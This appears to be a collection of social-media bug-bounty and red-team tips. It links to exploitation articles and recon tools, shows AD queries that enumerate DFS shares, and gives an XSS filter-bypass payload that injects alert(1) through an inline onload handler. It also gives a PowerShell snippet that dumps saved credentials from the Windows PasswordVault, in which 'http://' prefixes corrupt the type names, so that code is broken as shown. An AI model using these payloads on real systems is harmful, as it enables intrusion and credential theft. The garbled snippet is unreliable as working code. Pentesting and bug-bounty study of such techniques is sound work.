GraphQL — Common vulnerabilities & how to exploit them
https://t.co/zwuE1akzCH
Mastering the Skills of Bug Bounty
https://t.co/aqgP65mTbr
Methods to Bypass Rate Limit
https://t.co/T38i5qR3hJ
Bug bounty resources & advices
https://t.co/GAvQwPW0uo

#bugbounty,#bugbountytips

Self-reminder - finding DFS shares

AD
Get-ADObject -filter * -SearchBase "CN=Dfs-Configuration,CN=System,DC=a,DC=b" | select name

ADSI
$s=[adsisearcher]'(name=*)'; $s.SearchRoot = [adsi]"LDAP://CN=Dfs-Configuration,CN=System,dc=a,dc=b"; $s.FindAll() | % {$_.properties.name}

quoteless #XSS filter bypass (removing HTML chars) in an inline JS function with multiple params

Normal:
/page?x=1&y=2&z=3
Downwards arrow

<body onload="func('1', '2', '3')">

XSS:
/page?x=1&y=%5C&z=);alert(1);//
Downwards arrow

<body onload="func('1', '\', ');alert(1);//'">

Dump local Creds

PS>
[void][http://Windows.Security.Credentials.PasswordVault,http://Windows.Security.Credentials,ContentType=WindowsRuntime]
$pw = New-Object http://Windows.Security.Credentials.PasswordVault
$pw.RetrieveAll() | % { $_.RetrievePassword();$_ }

#redteam #pentest

#bugbounty Tools

https://github.com/milo2012/pathbrute
https://github.com/lc/subjs
https://github.com/KathanP19/gaussrf
https://github.com/stevemcilwain/quiver
https://github.com/proabiral/inception
https://github.com/Broly157/auto.sh
https://github.com/codingo/crithit
https://github.com/vortexau/dnsvalidator
https://github.com/theblackturtle/fprobe
https://github.com/reconness/reconness

#bugbountytips